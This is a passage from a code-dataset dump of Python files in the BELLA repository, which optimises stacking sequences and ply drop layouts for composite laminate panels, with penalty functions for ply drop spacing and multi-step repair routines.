0.305,\r\n (4, 7) : 0.508,\r\n (5, 8) : 0.508,\r\n (6, 7) : 0.305,\r\n (7, 8) : 0.305,\r\n (9, 10) : 0.610,\r\n (9, 11) : 0.457,\r\n (10, 12) : 0.457,\r\n (11, 12) : 0.610,\r\n (12, 13) : 0.305,\r\n (12, 16) : 0.305,\r\n (13, 14) : 0.305,\r\n (13, 16) : 0.508,\r\n (14, 15) : 0.305,\r\n (14, 17) : 0.508,\r\n (15, 18) : 0.508,\r\n (16, 17) : 0.305,\r\n (17, 18) : 0.305}\r\n\r\n# panel length in the x-direction (m)\r\nlength_x = (25.40/1000)*np.array([18, 18, 20, 20, 20, 20, 20, 20,\r\n 18, 18, 18, 18, 20, 20, 20, 20, 20, 20])\r\n\r\n# panel length in the y-direction (m)\r\nlength_y = (25.40/1000)*np.array([24, 24, 12, 12, 12, 12, 12, 12,\r\n 24, 24, 24, 24, 12, 12, 12, 12, 12, 12])\r\n\r\n# 1 lbf/in = 0.175127 N/mm\r\n# panel loading per unit width in the x-direction in N/m\r\nN_x = 175.127*np.array([700, 375, 270, 250, 210, 305, 290, 600,\r\n 1100, 900, 375, 400, 330, 190, 300, 815, 320, 300])\r\n\r\n# panel loading per unit width in the y-direction in N/m\r\nN_y = 175.127*np.array([400, 360, 325, 200, 100, 360, 195, 480,\r\n 600, 400, 525, 320, 330, 205, 610, 1000, 180, 410])\r\n\r\n\r\nsst = pd.read_excel(filename_input, sheet_name=sheet).fillna(-1)\r\nsst = np.array(sst, int).T\r\nsst = np.hstack((sst, np.flip(sst, axis=1)))\r\n\r\nn_plies_2_ss = dict()\r\nn_plies_2_lampam = dict()\r\nn_plies_2_sst = dict()\r\n\r\nfor stack_sst in sst:\r\n stack = np.copy(stack_sst)\r\n for ind_ply in range(38)[::-1]:\r\n if stack[ind_ply] == -1:\r\n stack = np.delete(stack, ind_ply)\r\n n_plies_2_sst[len(stack)] = stack_sst\r\n n_plies_2_ss[len(stack)] = stack\r\n n_plies_2_lampam[len(stack)] = calc_lampam(stack)\r\n\r\nsst = np.array([n_plies_2_sst[n] for n in n_plies_per_panel])\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=n_plies_2_lampam[n_plies_per_panel[ind_panel]],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies_per_panel[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\nmultipanel = MultiPanel(panels)\r\nmultipanel.filter_target_lampams(constraints, obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Checks for feasibility of the multi-panel composite layout ----------------\r\n\r\n#check_ply_drop_rules(sst, multipanel, constraints, reduced=False)\r\n\r\nfor stack in n_plies_2_ss.values():\r\n check_lay_up_rules(stack, constraints,\r\n no_ipo_check=True, no_bal_check=True)\r\n\r\n### Save data -----------------------------------------------------------------\r\n\r\nsave_multipanel(filename_res, multipanel, obj_func_param, calc_penalties=True,\r\n constraints=constraints, sst=sst)\r\nsave_constraints_BELLA(filename_res, constraints)\r\nsave_objective_function_BELLA(filename_res, obj_func_param)\r\nsave_materials(filename_res, materials)\r\nautofit_column_widths(filename_res)\r\n\r\n"
},
{
"alpha_fraction": 0.5216606259346008,
"alphanum_fraction": 0.5462093949317932,
"avg_line_length": 30.57647132873535,
"blob_id": "c765a4e39df3574f15d9d3bf707b9e6ae58ef1d2",
"content_id": "d8fdd5e997c74dca9dd36e44d45fb48d658b5640",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5540,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 170,
"path": "/src/guidelines/ply_drop_spacing.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n- calc_penalty_spacing_1ss\r\n calculates the ply drop spacing penalty of a panel regarding one of its\r\n boundary\r\n\r\n- calc_penalty_spacing\r\n calculates the penalties of a ply drop layout for the ply-drop spacing rule\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.format_pdl import reduce_for_guide_based_blending\r\n\r\n\r\ndef calc_penalty_spacing(\r\n pdl,\r\n multipanel,\r\n constraints,\r\n obj_func_param=None,\r\n on_blending_strip=False,\r\n pdl_before=None,\r\n pdl_after=None):\r\n \"\"\"\r\n calculates the penalties of a ply drop layout for the ply-drop spacing rule\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n - pdl: matrix of ply drop layouts of the current group\r\n - pdl_before: matrix of ply drop layout of the previous group\r\n - pdl_after: matrix of ply drop layout of the group placed afterwards\r\n - constraints: lay-up design guidelines\r\n - obj_func_param: objective function parameters\r\n - on_blending_strip: to be calculated on blending strip\r\n \"\"\"\r\n if not constraints.pdl_spacing:\r\n return 0\r\n\r\n ### blending strip --------------------------------------------------------\r\n if on_blending_strip:\r\n\r\n if pdl_before is None:\r\n pdl_before = np.zeros((multipanel.reduced.n_panels, 0))\r\n if pdl_after is None:\r\n pdl_after = np.zeros((multipanel.reduced.n_panels, 0))\r\n\r\n penalty_spacing = 0\r\n\r\n for ind_panel1, ind_panel2 in multipanel.reduced.boundaries:\r\n\r\n if pdl[ind_panel1] is None or pdl[ind_panel2] is None \\\r\n or pdl[ind_panel1].size == 1 or pdl[ind_panel2].size == 1:\r\n continue\r\n\r\n # stack the ply drop layouts before/current/after\r\n layout1 = np.hstack((\r\n pdl_before[ind_panel1],\r\n pdl[ind_panel1],\r\n pdl_after[ind_panel1]))\r\n layout2 = np.hstack((\r\n pdl_before[ind_panel2],\r\n pdl[ind_panel2],\r\n pdl_after[ind_panel2]))\r\n\r\n # delete plies that does not cover the panels\r\n to_keep = [layout1[ind] != -1 or layout1[ind] != layout2[ind]\r\n for ind in range(layout1.size)]\r\n layout1 = layout1[to_keep]\r\n if -1 not in layout1:\r\n layout1 = layout2[to_keep]\r\n\r\n # print('ind_panel1, ind_panel2', ind_panel1, ind_panel2)\r\n # print(layout1)\r\n\r\n penalty_spacing += (multipanel.reduced.boundary_weights[\r\n (ind_panel1, ind_panel2)] * calc_penalty_spacing_1ss(\r\n layout1, constraints.min_drop))\r\n\r\n return penalty_spacing\r\n\r\n ### multi-panel -----------------------------------------------------------\r\n if not hasattr(multipanel, 'reduced'):\r\n multipanel.from_mp_to_blending_strip(constraints, n_plies_ref_panel=1)\r\n\r\n reduced_pdl = reduce_for_guide_based_blending(multipanel, pdl)\r\n\r\n# print('reduced_pdl.shape', reduced_pdl.shape)\r\n return calc_penalty_spacing(\r\n pdl=reduced_pdl,\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n obj_func_param=obj_func_param,\r\n on_blending_strip=True,\r\n pdl_before=pdl_before,\r\n pdl_after=pdl_after)\r\n\r\n\r\ndef is_same_pdl(pdl1, pdl2, ind_ref, thick_to_thin=True):\r\n \"\"\"\r\n returns True if pdl1 == pdl2\r\n \"\"\"\r\n if thick_to_thin:\r\n for index in range(ind_ref):\r\n if pdl1[index] is None:\r\n pass\r\n elif (pdl1[index] != pdl2[index]).any():\r\n return False\r\n return True\r\n\r\n for index in range(len(pdl1)):\r\n if pdl1[index] is None:\r\n pass\r\n elif (pdl1[index] != pdl2[index]).any():\r\n return False\r\n return True\r\n\r\n\r\ndef 
calc_penalty_spacing_1ss(ss, min_drop):\r\n \"\"\"\r\n returns the penalty for the ply drop spacing rule by considering the\r\n stacking sequence in one panel in reference to one of its neighbouring panels\r\n\r\n Sum of the missing continuous plies between ply drops divided by the length\r\n of the ply drop layout\r\n\r\n - min_drop: minimum number of continuous plies required between two blocks\r\n of dropped plies\r\n \"\"\"\r\n penal = 0\r\n # identify the indices of the successive -1 elements in the array\r\n index1 = 0\r\n while index1 < ss.size:\r\n if ss[index1] == -1:\r\n break\r\n else:\r\n index1 += 1\r\n index2 = index1 + 1\r\n while index2 < ss.size:\r\n while index2 < ss.size:\r\n if ss[index2] == -1:\r\n break\r\n else:\r\n index2 += 1\r\n # test for the ply drop spacing condition\r\n if index2 < ss.size and index2 - index1 - 1 < min_drop:\r\n penal += min_drop - (index2 - index1 - 1)\r\n index1 = index2\r\n index2 += 1\r\n return penal / ss.size\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n print('\\n*** Test for the function calc_penalty_spacing_1ss ***')\r\n ss = np.array([-1, 0, 0, -1, 0., 1., -1., 2., -1., 4., -1, 1., -1])\r\n min_drop = 2\r\n p = calc_penalty_spacing_1ss(ss, min_drop)\r\n print(ss)\r\n print(f'Penalty for the ply drop spacing rule: {p}')\r\n\r\n print(calc_penalty_spacing_1ss(np.array([\r\n 1., 2., 3., 4., 5., 6.,-1., 7., 8., 9., 10., -1.,\r\n -1.,11.,11.,-1.,-1.,10.,\r\n 9., 8., 7.,-1., 6., 5., 4., 3., 2., 1.]), 2))\r\n\r\n"
},
{
"alpha_fraction": 0.5782715082168579,
"alphanum_fraction": 0.5852017998695374,
"avg_line_length": 43.425926208496094,
"blob_id": "64fa112c2c29bd2b27a5b2bad3ef0ca204d12e29",
"content_id": "66818c6b306a71a0c8665d2aeabfcfb482a8b93b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4906,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 108,
"path": "/src/RELAY/repair_mp.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nRepair strategy for guide based blending\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\nfrom src.BELLA.format_pdl import convert_ss_to_sst\r\nfrom src.RELAY.thick_to_thin import repair_thick_to_thin\r\nfrom src.RELAY.thin_to_thick import repair_thin_to_thick\r\nfrom src.RELAY.repair_reference_panel import repair_reference_panel\r\nfrom src.guidelines.one_stack import check_ply_drop_rules\r\n\r\ndef repair_mp(multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0):\r\n \"\"\"\r\n repairs a multi-panel design to meet design and manufacturing guidelines\r\n and evaluates the performance of the repaired stacking sequence.\r\n\r\n The repair process is deterministic and attempts at conducting minimal\r\n modification of the original stacking sequence with a preference for\r\n modifying outer plies that have the least influence on out-of-plane\r\n properties.\r\n\r\n step 1:\r\n repair of the reference panel stacking sequence\r\n\r\n step 2:\r\n repair of the other panels by re-designing the ply drop layout\r\n\r\n INPUTS\r\n\r\n - n_panels: number of panels in the entire structure\r\n - reduced_ss: stacking sequence of the laminate\r\n - multipanel: multipanel structure\r\n - constraints: instance of the class Constraints\r\n - parameters: instance of the class Parameters\r\n - obj_func_param: objective function parameters\r\n - reduced_pdl: ply drop layout\r\n - mat: material properties\r\n \"\"\"\r\n #--------------------------------------------------------------------------\r\n # step 1 / reference panel repair\r\n #--------------------------------------------------------------------------\r\n print('---- Blending step 4.1 ----')\r\n success, reduced_lampam, reduced_sst, reduced_ss = repair_reference_panel(\r\n multipanel, reduced_ss, constraints, parameters, obj_func_param,\r\n reduced_pdl, mat=0)\r\n if not success:\r\n print('Blending step 4.1 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 1\r\n\r\n #--------------------------------------------------------------------------\r\n # step 2 / re-optimise the ply drop layout - thick-to-thin repair\r\n #--------------------------------------------------------------------------\r\n print('---- Blending step 4.2 ----')\r\n# print('reduced_sst', reduced_sst.shape)\r\n# print_list_ss(reduced_sst[:,:reduced_sst.shape[1] // 2])\r\n# print('SS_ref')\r\n# print_ss(ss_ref[:ss_ref.size // 2])\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n success, reduced_sst, reduced_lampam, reduced_ss = repair_thick_to_thin(\r\n reduced_lampam, reduced_sst, reduced_ss, multipanel,\r\n parameters, obj_func_param, constraints, mat=mat)\r\n if not success:\r\n print('Blending step 4.2 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 2\r\n # check that the reference panel stacking sequence has not been changed\r\n if (reduced_ss[multipanel.reduced.ind_ref] != ss_ref).any():\r\n raise Exception(\"\"\"\r\nReference stacking sequence modified during blending step 4.2\"\"\")\r\n\r\n #--------------------------------------------------------------------------\r\n # step 3 / re-optimise the ply drop layout - thin-to-thck repair\r\n 
#--------------------------------------------------------------------------\r\n print('---- Blending step 4.3 ----')\r\n success, reduced_sst, reduced_lampam, reduced_ss = repair_thin_to_thick(\r\n reduced_lampam, reduced_sst, reduced_ss, multipanel,\r\n parameters, obj_func_param, constraints, mat=mat)\r\n if not success:\r\n print('Blending step 4.3 unsuccessful')\r\n reduced_sst = convert_ss_to_sst(reduced_ss, reduced_pdl)\r\n return False, reduced_ss, reduced_sst, reduced_pdl, 3\r\n\r\n # check that the reference panel stacking sequence has not been changed\r\n if (reduced_ss[multipanel.reduced.ind_ref] != ss_ref).any():\r\n raise Exception(\"\"\"\r\nReference stacking sequence modified during blending step 4.3\"\"\")\r\n\r\n #--------------------------------------------------------------------------\r\n # return result\r\n #--------------------------------------------------------------------------\r\n# check_ply_drop_rules(reduced_sst, multipanel, constraints)\r\n\r\n # test for the ply counts\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n if reduced_ss[ind_panel].size != panel.n_plies:\r\n raise Exception(\"\"\"Wrong ply counts in the laminate.\"\"\")\r\n\r\n# print('Blending step 4 successful')\r\n return True, reduced_ss, reduced_sst, reduced_pdl, 4\r\n"
},
{
"alpha_fraction": 0.5071031451225281,
"alphanum_fraction": 0.5142063498497009,
"avg_line_length": 44.57646942138672,
"blob_id": "84d36b95a48d6ea822467ee46112cdd68c5b715c",
"content_id": "70ae8607f11648932f39ba0ac79d931efb28f875",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31676,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 680,
"path": "/src/RELAY/thin_to_thick.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions used for the repair of panels with the thin-to-thick methodology:\r\n plies of a reference stacking sequence are left unchanged and the\r\n positions and fibre orientations of the plies to add necessary to design\r\n the thicker panels are re-optimised with the objective to better match\r\n panel lamination parameter targets while also satisfying design and\r\n manufacturing constraints\r\n\r\n- repair_thin-to-thick\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n and some fibre orientations with the thin-to-thick methodology\r\n\r\n- modify_indices_2\r\n modifies the list of indices for the last ply drop positions so they become\r\n related to the last thickness and not to successive panel thicknesses\r\n\r\n- reduced_sst_to_plydrops\r\n returns the list of indices for plies added in each panel with reference\r\n to next panels\r\n\r\n- rebuild_sst and rebuild_sst_2\r\n reconstructs the reduced stacking sequence table after thin-to-thick repair\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nfrom copy import deepcopy\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.guidelines.ply_drop_spacing import calc_penalty_spacing\r\n#from src.guidelines.ply_drop_spacing import is_same_pdl\r\nfrom src.guidelines.contiguity import calc_penalty_contig_ss\r\nfrom src.guidelines.disorientation import calc_n_penalty_diso_ss\r\n# from src.guidelines.ipo_oopo import calc_penalty_oopo_ss\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_pc\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.BELLA.objectives import calc_obj_one_panel\r\nfrom src.BELLA.objectives import calc_obj_multi_panel\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\n# if apply_balance_1_by_1 == True\r\n# - if an angled ply is added/removed from a balance panel, the next ply\r\n# to be removed/added rectify balance\r\n# otherwise\r\n# - all panels of the blending strip are enforced to be balance. 
This can\r\n# cause issues if the blending strip contains many panels with\r\n# incremental ply counts\r\napply_balance_1_by_1 = True\r\n\r\ndef repair_thin_to_thick(\r\n reduced_lampam, reduced_sst, reduced_ss,\r\n multipanel, parameters, obj_func_param, constraints, mat=0):\r\n \"\"\"\r\n performs repair of multi-panel structure by modifying the ply drop layout\r\n and some fibre orientations with the thin-to-thick methodology\r\n \"\"\"\r\n ### initialisation\r\n ss_ref = np.copy(reduced_ss[multipanel.reduced.ind_ref])\r\n n_plies_max = multipanel.reduced.n_plies_in_panels[-1]\r\n n_plies = multipanel.reduced.n_plies_ref_panel\r\n# print_list_ss(reduced_sst)\r\n\r\n # clean pdl by removing plies to be redesigned\r\n for ind in range(reduced_sst.shape[1])[::-1]:\r\n if reduced_sst[multipanel.reduced.ind_ref, ind] == -1:\r\n reduced_sst = np.delete(reduced_sst, np.s_[ind], axis=1)\r\n\r\n n_steps = multipanel.reduced.n_steps_thick\r\n ind_panel_tab = multipanel.reduced.ind_panel_thick_tab\r\n new_boundary_tab = multipanel.reduced.new_boundary_thick_tab\r\n\r\n# print('n_steps', n_steps)\r\n# print('ind_panel_tab', ind_panel_tab)\r\n# print('new_boundary_tab', new_boundary_tab)\r\n\r\n if n_steps == 0: # no change\r\n return True, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n\r\n ## number of plies in each direction\r\n initial_n_plies_per_angle = [\r\n None for ind in range(multipanel.reduced.n_panels)]\r\n n_plies_per_angle_ref = np.zeros(\r\n (constraints.n_set_of_angles), dtype='float16')\r\n for index in range(ss_ref.size):\r\n index = constraints.ind_angles_dict[ss_ref[index]]\r\n n_plies_per_angle_ref[index] += 1\r\n initial_n_plies_per_angle[multipanel.reduced.ind_ref] \\\r\n = np.copy(n_plies_per_angle_ref)\r\n n_plies_per_angle_tab = [initial_n_plies_per_angle]\r\n\r\n ## ply-drop layouts\r\n initial_pdl = [None for ind in range(multipanel.reduced.n_panels)]\r\n for ind in range(multipanel.reduced.ind_ref + 1):\r\n initial_pdl[ind] = reduced_sst[ind]\r\n pdls_tab = [initial_pdl]\r\n\r\n ## lamination parameters\r\n initial_lampam = [None for ind in range(multipanel.reduced.n_panels)]\r\n for ind in range(multipanel.reduced.n_panels):\r\n initial_lampam[ind] = reduced_lampam[ind]\r\n lampam_tab = [initial_lampam]\r\n\r\n\r\n ## penalties\r\n# initial_pdl_diso = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_diso[multipanel.reduced.ind_ref] = 0\r\n# penalty_diso_tab = [initial_pdl_diso]\r\n#\r\n# initial_pdl_contig = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_contig[multipanel.reduced.ind_ref] = 0\r\n# penalty_contig_tab = [initial_pdl_contig]\r\n\r\n # initial_pdl_oopo = [None for ind in range(multipanel.reduced.n_panels)]\r\n # initial_pdl_oopo[multipanel.reduced.ind_ref] = 0\r\n # penalty_oopo_tab = [initial_pdl_oopo]\r\n\r\n# initial_pdl_10 = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_10[multipanel.reduced.ind_ref] = 0\r\n# penalty_10_tab = [initial_pdl_10]\r\n\r\n# initial_pdl_bal = [None for ind in range(multipanel.reduced.n_panels)]\r\n# initial_pdl_bal[multipanel.reduced.ind_ref] = 0\r\n# penalty_bal_tab = [initial_pdl_bal]\r\n\r\n penalty_spacing_tab = [None]\r\n\r\n last_pdl_index_tab = [None]\r\n\r\n ## objectives\r\n obj_no_constraints_tab = [[\r\n None for ind in range(multipanel.reduced.n_panels)]]\r\n obj_no_constraints_tab[0][multipanel.reduced.ind_ref] = 0\r\n\r\n obj_constraints_tab = np.zeros((1,), dtype=float)\r\n\r\n angle_queue_tab = [np.array((), dtype=int)]\r\n\r\n 
n_obj_func_calls = 0\r\n\r\n if constraints.sym:\r\n n_plies -= 2\r\n else:\r\n n_plies -= 1\r\n\r\n for ind_step in range(n_steps):\r\n\r\n # number of plies previous stacking sequence\r\n if constraints.sym:\r\n n_plies += 2\r\n else:\r\n n_plies += 1\r\n\r\n ind_panel_now = ind_panel_tab[ind_step]\r\n\r\n# print('------------------------')\r\n# print('ind_step', ind_step)\r\n# print('------------------------\\n')\r\n\r\n if len(obj_constraints_tab) == 0:\r\n return False, reduced_sst, reduced_lampam, reduced_ss\r\n\r\n for node in range(len(obj_constraints_tab)):\r\n \r\n ### selection of node to be branched (first in the list)\r\n mother_pdl = pdls_tab.pop(0)\r\n mother_lampam = lampam_tab.pop(0)\r\n mother_n_plies_per_angle = n_plies_per_angle_tab.pop(0)\r\n mother_obj_no_constraints = obj_no_constraints_tab.pop(0)\r\n# mother_penalty_diso = penalty_diso_tab.pop(0)\r\n# mother_penalty_contig = penalty_contig_tab.pop(0)\r\n mother_angle_queue = angle_queue_tab.pop(0)\r\n # mother_penalty_oopo = penalty_oopo_tab.pop(0)\r\n# mother_penalty_10 = penalty_10_tab.pop(0)\r\n del penalty_spacing_tab[0]\r\n del last_pdl_index_tab[0]\r\n obj_constraints_tab = np.delete(obj_constraints_tab, np.s_[0])\r\n\r\n # print('mother_pdl')\r\n # print(mother_pdl)\r\n\r\n ### branching + pruning for damage tolerance rule and covering rule\r\n # pd : index position new ply on new stacking sequence\r\n if constraints.covering:\r\n if constraints.sym:\r\n if constraints.n_covering == 1:\r\n child_pd_indices = np.arange(1, n_plies // 2 + 1)\r\n elif constraints.n_covering == 2:\r\n child_pd_indices = np.arange(2, n_plies // 2 + 1)\r\n else:\r\n if constraints.n_covering == 1:\r\n child_pd_indices = np.arange(1, n_plies)\r\n elif constraints.n_covering == 2:\r\n child_pd_indices = np.arange(2, n_plies - 1)\r\n else:\r\n if constraints.sym:\r\n child_pd_indices = np.arange(n_plies // 2 + 1)\r\n else:\r\n child_pd_indices = np.arange(n_plies + 1)\r\n # print('child_pd_indices', child_pd_indices)\r\n\r\n n_tab_nodes = 0\r\n tab_child_pdl = []\r\n tab_penalty_spacing = []\r\n tab_angle_queue = []\r\n tab_last_pdl_index = []\r\n\r\n for one_pd_index in child_pd_indices:\r\n # print('one_pd_index', one_pd_index)\r\n\r\n ### branching for ply orientation of new ply\r\n child_angle = np.copy(constraints.set_of_angles, int)\r\n\r\n ### pruning for balance\r\n if constraints.bal:\r\n for ind_angle in range(constraints.n_set_of_angles)[::-1]:\r\n\r\n angle = child_angle[ind_angle]\r\n\r\n if apply_balance_1_by_1:\r\n if mother_angle_queue \\\r\n and angle != -mother_angle_queue[0]:\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n else:\r\n if mother_angle_queue:\r\n if angle != -mother_angle_queue[0]:\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n elif (ind_step == n_steps - 1 \\\r\n or new_boundary_tab[ind_step + 1]) \\\r\n and angle not in (0, 90):\r\n child_angle = np.delete(\r\n child_angle, np.s_[ind_angle])\r\n\r\n for ind_angle in range(len(child_angle)):\r\n angle = child_angle[ind_angle]\r\n\r\n if constraints.bal:\r\n if mother_angle_queue:\r\n tab_angle_queue.append([])\r\n elif angle not in (0, 90):\r\n tab_angle_queue.append([angle])\r\n else:\r\n tab_angle_queue.append([])\r\n else:\r\n tab_angle_queue.append([])\r\n\r\n ### ply drop layout\r\n child_pdl = deepcopy(mother_pdl)\r\n # print('mumpdl')\r\n # print(child_pdl)\r\n\r\n if new_boundary_tab[ind_step]:\r\n child_pdl[ind_panel_now] = np.copy(\r\n child_pdl[ind_panel_now - 1])\r\n\r\n for ind_p in 
range(ind_panel_now):\r\n child_pdl[ind_p] = np.hstack((\r\n child_pdl[ind_p][:one_pd_index],\r\n -1,\r\n child_pdl[ind_p][one_pd_index:]))\r\n\r\n child_pdl[ind_panel_now] = np.hstack((\r\n child_pdl[ind_panel_now][:one_pd_index],\r\n child_angle[ind_angle],\r\n child_pdl[ind_panel_now][one_pd_index:]))\r\n\r\n if constraints.sym:\r\n for ind_p in range(ind_panel_now):\r\n child_pdl[ind_p] = np.hstack((\r\n child_pdl[ind_p][:n_plies - one_pd_index + 1],\r\n -1,\r\n child_pdl[ind_p][n_plies - one_pd_index + 1:]))\r\n\r\n child_pdl[ind_panel_now] = np.hstack((\r\n child_pdl[ind_panel_now][\r\n :n_plies - one_pd_index + 1],\r\n child_angle[ind_angle],\r\n child_pdl[ind_panel_now][\r\n n_plies - one_pd_index + 1:]))\r\n\r\n # print('child_pdl')\r\n # print(child_pdl)\r\n\r\n ### penalties for the ply-drop layout rule\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=child_pdl,\r\n multipanel=multipanel,\r\n obj_func_param=obj_func_param,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# print('penalty_spacing', penalty_spacing)\r\n\r\n tab_child_pdl.append(child_pdl[:])\r\n tab_penalty_spacing.append(penalty_spacing)\r\n tab_last_pdl_index.append(one_pd_index)\r\n# print('child_pdl', child_pdl)\r\n\r\n\r\n ### local pruning for the ply-drop layout rules\r\n indices_to_keep = []\r\n tab_penalty_spacing_for_pruning = np.copy(tab_penalty_spacing)\r\n if len(tab_penalty_spacing_for_pruning) \\\r\n > parameters.local_node_limit2:\r\n\r\n while len(indices_to_keep) < parameters.local_node_limit2:\r\n\r\n min_value = min(tab_penalty_spacing_for_pruning)\r\n indices_to_add = np.where(\r\n tab_penalty_spacing_for_pruning == min_value)[0]\r\n for elem in indices_to_add:\r\n indices_to_keep.append(elem)\r\n tab_penalty_spacing_for_pruning[elem] = 1000\r\n\r\n indices_to_keep.sort()\r\n# print('indices_to_keep', indices_to_keep)\r\n tab_child_pdl = [tab_child_pdl[index] \\\r\n for index in indices_to_keep]\r\n tab_penalty_spacing = [tab_penalty_spacing[index] \\\r\n for index in indices_to_keep]\r\n tab_angle_queue = [tab_angle_queue[index] \\\r\n for index in indices_to_keep]\r\n tab_last_pdl_index = [tab_last_pdl_index[index] \\\r\n for index in indices_to_keep]\r\n \r\n ### calculations of lay-up penalties and multi-panel objective\r\n # function values\r\n tab_child_n_plies_per_angle = []\r\n tab_child_lampam = []\r\n # tab_child_penalty_oopo = []\r\n# tab_child_penalty_diso = []\r\n# tab_child_penalty_contig = []\r\n tab_child_obj_no_constraints = []\r\n tab_child_obj_constraints = []\r\n# tab_child_penalty_10 = []\r\n\r\n for ind_pd in range(len(tab_child_pdl))[::-1]:\r\n ### calculation of the stacking sequence in the currently\r\n # optimised panel\r\n child_ss = np.copy(tab_child_pdl[ind_pd][ind_panel_now])\r\n child_ss = child_ss[child_ss != -1]\r\n # print('child_ss', child_ss.size)\r\n # print(child_ss[:child_ss.size // 2])\r\n\r\n ### calculation of penalties for the disorientation constraint\r\n if constraints.diso:\r\n penalty_diso = calc_n_penalty_diso_ss(\r\n child_ss, constraints)\r\n # pruning for disorientation\r\n if penalty_diso != 0:\r\n # print('diso')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_diso = 0\r\n# child_penalty_diso = deepcopy(mother_penalty_diso)\r\n# child_penalty_diso[ind_panel_now] = penalty_diso\r\n# print('child_penalty_diso', child_penalty_diso)\r\n\r\n ### calculation of penalties for the contiguity constraint\r\n if 
constraints.contig:\r\n penalty_contig = calc_penalty_contig_ss(\r\n child_ss, constraints)\r\n # pruning for contiguity\r\n if penalty_contig != 0:\r\n # print('contig')\r\n del tab_child_pdl[ind_pd]\r\n del tab_penalty_spacing[ind_pd]\r\n del tab_angle_queue[ind_pd]\r\n del tab_last_pdl_index[ind_pd]\r\n continue\r\n else:\r\n penalty_contig = 0\r\n# child_penalty_contig = deepcopy(mother_penalty_contig)\r\n# child_penalty_contig[ind_panel_now] = penalty_contig\r\n# print('child_penalty_contig', child_penalty_contig)\r\n\r\n ### calculation of the number of plies in each direction\r\n child_n_plies_per_angle = deepcopy(mother_n_plies_per_angle)\r\n if new_boundary_tab[ind_step]:\r\n child_n_plies_per_angle[ind_panel_now] = np.copy(\r\n child_n_plies_per_angle[ind_panel_now - 1])\r\n\r\n index_pd = tab_last_pdl_index[ind_pd]\r\n index = constraints.ind_angles_dict[child_ss[index_pd]]\r\n\r\n if constraints.sym:\r\n child_n_plies_per_angle[ind_panel_now][index] += 2\r\n else:\r\n child_n_plies_per_angle[ind_panel_now][index] += 1\r\n# print('child_n_plies_per_angle')\r\n# print(child_n_plies_per_angle)\r\n\r\n ### calculation of lamination parameters\r\n child_lampam = deepcopy(mother_lampam)\r\n child_lampam[ind_panel_now] \\\r\n = calc_lampam(child_ss, constraints)\r\n# print('child_lampam', child_lampam)\r\n\r\n ### 10% rule\r\n if constraints.rule_10_percent:\r\n if constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(\r\n child_ss,\r\n constraints,\r\n LPs=child_lampam[ind_panel_now],\r\n mp=False)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(\r\n child_n_plies_per_angle[ind_panel_now],\r\n constraints)\r\n # pruning for 10% rule\r\n if penalty_10 != 0:\r\n # print('10')\r\n del 